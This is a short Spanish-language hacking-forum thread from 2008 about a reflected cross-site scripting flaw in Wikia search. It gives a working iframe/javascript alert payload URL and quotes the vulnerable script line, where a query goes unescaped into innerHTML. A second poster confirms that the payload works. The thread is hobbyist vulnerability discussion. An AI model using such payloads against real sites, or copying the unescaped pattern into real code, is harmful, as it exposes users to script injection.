Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: Thor en 8 Enero 2008, 15:04 PM

Título: Xss en Wikia search?
Publicado por: Thor en 8 Enero 2008, 15:04 PM
http://re.search.wikia.com/search#%22%3Elink%3C/a%3E%3CIFRAME%20SRC=%22javascript:alert('XSS');%22%3E%3C/IFRAME%3E (http://re.search.wikia.com/search#%22%3Elink%3C/a%3E%3CIFRAME%20SRC=%22javascript:alert('XSS');%22%3E%3C/IFRAME%3E)

El problema creo que está por aquí:
http://re.search.wikia.com/search-a1.js
Código [Seleccionar]
$("sr-mini-content").innerHTML = 'We do not have a mini article about "'+q.escapeHTML()+'".  Improve the search results for everyone by <a href="http://search.wikia.com/index.php?title=Mini:'+q+'&action=edit">starting</a> this article!';

¿Se podría hacer sin lo de iframe? Directamente no he podido :(
Título: Re: Xss en Wikia search?
Publicado por: NewLog en 9 Enero 2008, 23:20 PM
Qué grande es No-Script... hasta detecta los Xss...

Funciona.
Sólo texto | Texto con Imágenes